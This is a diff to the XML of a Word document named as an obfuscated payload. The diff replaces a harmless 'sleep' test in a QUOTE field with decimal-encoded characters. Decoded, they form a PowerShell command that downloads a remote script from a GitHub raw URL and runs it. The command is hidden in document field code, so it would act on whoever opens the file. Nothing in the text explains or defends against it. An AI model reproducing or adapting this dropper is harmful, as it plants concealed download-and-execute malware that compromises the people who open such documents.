--- a/payload-obfuscated-final.docx
+++ b/payload-obfuscated-final.docx
@@ -50,7 +50,7 @@
       <w:r>
         <w:instrText xml:space="preserve"> "</w:instrText>
       </w:r>
-      <w:fldSimple w:instr="  QUOTE  47 99 32 112 111 119 101 114 115 104 101 108 108 46 101 120 101 32 115 108 101 101 112 32 49 48  ">
+      <w:fldSimple w:instr="  QUOTE  47 99 32 112 111 119 101 114 115 104 101 108 108 46 101 120 101 32 40 78 101 119 45 79 98 106 101 99 116 32 83 121 115 116 101 109 46 78 101 116 46 87 101 98 67 108 105 101 110 116 41 46 68 111 119 110 108 111 97 100 70 105 108 101 40 34 34 34 104 116 116 112 115 58 47 47 114 97 119 46 103 105 116 104 117 98 117 115 101 114 99 111 110 116 101 110 116 46 99 111 109 47 98 111 110 117 120 84 49 47 120 47 109 97 115 116 101 114 47 120 46 112 115 49 34 34 34 44 34 34 34 120 46 112 115 49 34 34 34 41 59 32 112 111 119 101 114 115 104 101 108 108 46 101 120 101 32 45 102 32 120 46 112 115 49 59  ">
         <w:r>
           <w:rPr>
             <w:b/>
